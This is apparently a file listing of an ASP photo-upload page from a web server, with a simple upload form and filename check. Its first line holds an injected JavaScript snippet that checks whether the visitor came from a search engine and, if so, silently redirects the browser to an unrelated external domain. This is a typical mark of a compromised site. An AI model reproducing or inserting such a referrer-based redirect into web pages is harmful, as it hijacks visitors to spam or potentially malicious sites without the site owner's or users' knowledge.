d:\wwwroot\wuchunhua\Upload_Photo.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><html>
002: <head>
003: <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
004: <style type="text/css">
005: <!--
006: BODY{
007: BACKGROUND-COLOR: #E1F4EE;
008: font-size:9pt
009: }
010: .tx1 { height: 20px;font-size: 9pt; border: 1px solid; border-color: #000000; color: #0000FF}
011: -->

012: </style>
013:
014: <SCRIPT language=javascript>
015: function check()
016: {
017:    var strFileName=document.form1.FileName.value;
018:    if (strFileName=="")
019:    {
020:        alert("请选择要上传的文件");
021:       document.form1.FileName.focus();
022:        return false;
023:      }
024: }
025: </SCRIPT>
026: </head>
027: <body leftmargin="0" topmargin="0">
028: <form action="Upfile_Photo.asp" method="post" name="form1" onSubmit="return check()" enctype="multipart/form-data">
029:   <input name="FileName" type="FILE" class="tx1" size="30">
030:   <input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">
031:   <input name="PhotoUrlID" type="hidden" id="PhotoUrlID" value="<%=Clng(trim(request("PhotoUrlID")))%>">
032: </form>
033: </body>
034: </html>
035:
036:
037: